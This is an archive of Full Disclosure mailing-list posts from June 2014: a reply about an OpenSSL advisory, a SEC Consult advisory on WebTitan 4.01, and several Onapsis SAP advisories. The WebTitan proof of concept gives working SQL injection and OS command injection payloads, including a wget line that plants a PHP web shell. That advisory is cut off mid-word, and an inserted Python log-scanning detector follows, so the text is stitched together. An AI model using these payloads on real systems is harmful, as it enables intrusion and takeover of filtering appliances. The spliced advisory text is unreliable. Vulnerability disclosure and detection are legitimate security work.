Re: [FD] More OpenSSL issues
This does not appear to be the same panic level as the previous patch. In other words the previous openssl vuln was worse than the instability of all-night patching. This one is not. Take time to roll out right.

On June 5, 2014 7:51:50 AM PDT, Jordan Urie wrote:
> Ladies and Gentlemen,
>
> https://www.openssl.org/news/secadv_20140605.txt
>
> There's an MITM in there, and a potential for buffer over-runs.
>
> Patch up :-)
>
>
> Jordan
>
> --
>
> Jordan R. Urie
>
> UP Technology Consulting, Inc.
> 1129 - 177A St. SW
> Edmonton, AB T6W 2A1
> Phone: (780) 809-0932
>
> www.uptech.ca
>
> ___
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

--
Sent from my Android phone with K-9 Mail. Please excuse my brevity.
[FD] SEC Consult SA-20140606-0 :: Multiple critical vulnerabilities in WebTitan
SEC Consult Vulnerability Lab Security Advisory < 20140606-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: WebTitan
 vulnerable version: 4.01 (Build 68)
      fixed version: 4.04
             impact: critical
           homepage: http://www.webtitan.com
              found: 2014-04-07
                 by: Robert Giruckas, Mindaugas Liudavicius
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"WebTitan offers ultimate protection from internet based threats and powerful web filtering functionalities to SMBs, Service Providers and Education sectors around the World."

Source: http://www.webtitan.com/about-us/webtitan

Business recommendation:
------------------------
Multiple critical security vulnerabilities have been identified in the WebTitan system. By exploiting these vulnerabilities, potential attackers could take control over the entire system.

It is highly recommended by SEC Consult not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) SQL Injection
A SQL injection vulnerability in the /categories-x.php script allows unauthenticated remote attackers to execute arbitrary SQL commands via the "sortkey" parameter.

2) Remote command execution
Multiple remote command execution vulnerabilities were detected in the WebTitan GUI. This security flaw exists due to lack of input validation. An authenticated attacker of any role (Administrator, Policy Manager, Report Manager) can execute arbitrary OS commands with the privileges of the web server.

3) Path traversal
The web GUI fails to properly filter user input passed to the logfile parameter. This leads to arbitrary file download by unauthenticated attackers.

4) Unprotected Access
The web GUI does not require authentication for certain PHP scripts. This security issue allows an unauthenticated remote attacker to download WebTitan configuration backup (including hashed user credentials) to the attacker's FTP server.

Proof of concept:
-----------------
1) SQL Injection
The manipulation of the "sortkey" parameter allows users to modify the original SQL query.

GET /categories-x.php HTTP/1.1
/categories-x.php?getcategories&sortkey=name) limit 1;--
/categories-x.php?getcategories&sortkey=name) limit 5;--

2) Remote command execution
Due to improper user input validation it is possible to inject arbitrary OS commands using backticks ``. Some of the affected files do not sanitize any type of shell metacharacters; this allows an attacker to use more flexible OS commands.

Tested and working payload for most scripts:
`/usr/local/bin/wget http:// -O /usr/blocker/www/graph/CPU/xshell.php`

Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php, scheduledreports-x.php, reporting-x.php, network-x.php

a. logs-x.php, vulnerable parameters: fname, logfile
/logs-x.php?jaction=view&fname=webtitan.log;ls -la
/logs-x.php POST Content: jaction=delete&logfile=

b. users-x.php, vulnerable parameters: ldapserver
/users-x.php?findLdapDC=1&ldapserver=

c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
/support-x.php POST Content: jaction=ping&pinghost=
/support-x.php POST Content: jaction=ping&dighost=
/support-x.php POST Content: jaction=ping&tracehost=

d. time-x.php, vulnerable parameters: ntpserversList
/time-x.php POST Content: jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=

e. scheduledreports-x.php, vulnerable parameters: reportid
/scheduledreports-x.php?runReport=1&reportid=

f. reporting-x.php, vulnerable parameter: delegated_admin
/reporting-x.php POST Content: jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';'&gotopage=1

g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols length), domain
jaction=saveHostname&hostname=`root`
jaction=saveDNS&domain=domain.com;&dnsservers=192.168.0.1-:-

3) Path traversal
Due to missing input filtering in the logs-x.php script it is possible to download arbi
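A log-scanning check for the request patterns the advisory above describes, added here as an example and not part of SEC Consult's advisory or WebTitan's code. It assumes the appliance's web server writes an Apache combined-format access log; the script/parameter table comes from the advisory text and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Scripts and parameters named in the advisory above (lookup table built from its text).
WATCHED = {
    "/categories-x.php": {"sortkey"}, "/logs-x.php": {"fname", "logfile"},
    "/users-x.php": {"ldapserver"}, "/support-x.php": {"tracehost", "dighost", "pinghost"},
    "/time-x.php": {"ntpserversList"}, "/scheduledreports-x.php": {"reportid"},
    "/reporting-x.php": {"delegated_admin"}, "/network-x.php": {"hostname", "domain"},
}
# Shell/SQL metacharacters and traversal sequences that never belong in these parameters.
SUSPICIOUS = re.compile(r"[`;|&$']|\.\./|\)\s*limit\b|--", re.IGNORECASE)
# Apache "combined" request line; assumption: the appliance's web server logs in this format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_query(s):
    """Split a query string or POST body on '&' only, so a ';' in a value survives for inspection."""
    out = {}
    for pair in (s.split("&") if s else []):
        key, _, value = pair.partition("=")
        out.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return out

def analyse_request(target, body=""):
    """Return (script, parameter, decoded value) hits for a request target plus optional POST body."""
    parts = urlsplit(target)
    params = WATCHED.get(parts.path, ())
    qs = parse_query(parts.query)
    for key, values in parse_query(body).items():
        qs.setdefault(key, []).extend(values)
    return [(parts.path, name, value)
            for name in sorted(params) for value in qs.get(name, [])
            if SUSPICIOUS.search(value)]

def scan_log(text):
    """Return (client_ip, script, parameter, value) for every suspicious request in an access log."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            alerts.extend((m["ip"],) + hit for hit in analyse_request(m["target"]))
    return alerts

# Constructed sample log: two exploitation attempts followed by one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Apr/2014:10:01:02 +0000] "GET /categories-x.php?getcategories&sortkey=name)%20limit%201;-- HTTP/1.1" 200 512
203.0.113.5 - - [07/Apr/2014:10:01:09 +0000] "GET /logs-x.php?jaction=view&fname=webtitan.log;ls%20-la HTTP/1.1" 200 2048
198.51.100.7 - - [07/Apr/2014:10:02:00 +0000] "GET /categories-x.php?getcategories&sortkey=name HTTP/1.1" 200 512
"""
```

POST bodies are not present in a standard access log, so `analyse_request` takes the body as a second argument for request logs (a WAF or reverse proxy) that do capture it.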
[FD] [Onapsis Security Advisories] Multiple Hard-coded Usernames in SAP Components
Onapsis Security Advisories: Multiple Hard-coded Usernames (CWE-798) have been found and patched in a variety of SAP components. Summaries of the advisories with links to full versions follow:

1. ONAPSIS-2014-011 - SAP Project System Structures and Project-Oriented Procurement Hard-coded credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Affected Components:
   * Project System
   * Structures
   * Project-Oriented Procurement
   (Check SAP Note 1791081 for detailed information on affected releases)
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-011

2. ONAPSIS-2014-012 - SAP Brazil Specific Add-On Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note: 1768049
-- Affected Components:
   * Brazil Specific Add-On
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-012

3. ONAPSIS-2014-013 - SAP OIL Industry Solution Traders and Schedulers Workbench Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.6 (AV:N/AC:H/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1920323
-- Affected Components:
   * SAP Oil Industry Solution Traders and Schedulers Workbench
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-013

4. ONAPSIS-2014-014 - SAP Upgrade tools for ABAP Hard-coded credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:N/I:P/A:P)
-- Fix in SAP Note: 1915873
-- Affected Components:
   * SAP Upgrade Tools
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-014

5. ONAPSIS-2014-015 - SAP Web Services Tool Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note: 1914777
-- Affected Components:
   * SAP Web Services Tool
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-015

6. ONAPSIS-2014-016 - SAP CCMS Monitoring Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1911174
-- Affected Components:
   * SAP CCMS Monitoring
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-016

7. ONAPSIS-2014-017 - SAP Transaction Data Pool Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1795463
-- Affected Components:
   * SAP Transaction Data Pool
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-017

8. ONAPSIS-2014-018 - SAP Capacity Leveling Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1789569
-- Affected Components:
   * SAP Capacity Leveling
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-018

9. ONAPSIS-2014-019 - SAP Open Hub Service Hard-coded Credentials
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:P/I:P/A:N)
-- Fix in SAP Note: 1738965
-- Affected Components:
   * SAP Open Hub Service
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-019

--
Ezequiel Gutesman
Director Of Research
Onapsis
[FD] [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering
Onapsis Security Advisory 2014-020: SAP SLD Information Tampering

1. Impact on Business
=====================
By exploiting this vulnerability, a remote unauthenticated attacker might be able to modify technical information about the SAP systems, potentially leading to a full compromise of all business information.

Risk Level: High

2. Advisory Information
=======================
-- Public Release Date: 2014-06-06
-- Subscriber Notification Date: 2014-06-06
-- Last Revised: 2014-06-06
-- Security Advisory ID: ONAPSIS-2014-020
-- Onapsis SVS ID: ONAPSIS-SVS00081
-- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen
-- Initial Base CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

3. Vulnerability Information
============================
-- Vendor: SAP
-- Affected Components:
   * SAP System Landscape Directory (available in all SAP JAVA App Servers)
   (Check SAP Note 1939334 for detailed information on affected releases)
-- Vulnerability Class: Improper Handling of Insufficient Permissions or Privileges (CWE-280)
-- Remotely Exploitable: Yes
-- Locally Exploitable: No
-- Authentication Required: No
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020

4. Affected Components Description
==================================
According to the vendor, "The System Landscape Directory (SLD) of SAP NetWeaver is the central source of system landscape information relevant for the management of your software life-cycle" [1].

5. Vulnerability Details
========================
The SLD is a central repository of technical and SAP systems-related information. The mechanism used to add new systems to the SLD is not properly secured by default, meaning that a remote unauthenticated attacker could interact with the SLD and, because of its architectural design, it could lead to a full SAP SLD system compromise.

Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===========
SAP has released SAP Note 1939334 which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1939334.

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.

7. Report Timeline
==================
2013-09-12: Vulnerability reported to SAP.
2013-09-13: SAP confirms having the information of vulnerability.
2014-02-11: SAP releases security patches.
2014-05-30: Onapsis notifies availability of security advisory to security mailing lists.

About Onapsis, Inc.
===================
Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats.

Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform.

Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security experts who are continuously invited to lecture at the leading IT security conferences, such as RSA and BlackHat, and featured by mainstream media such as CNN, Reuters, IDG and New York Times.

For further information about our solutions, please contact us at i...@onapsis.com and visit our website at www.onapsis.com.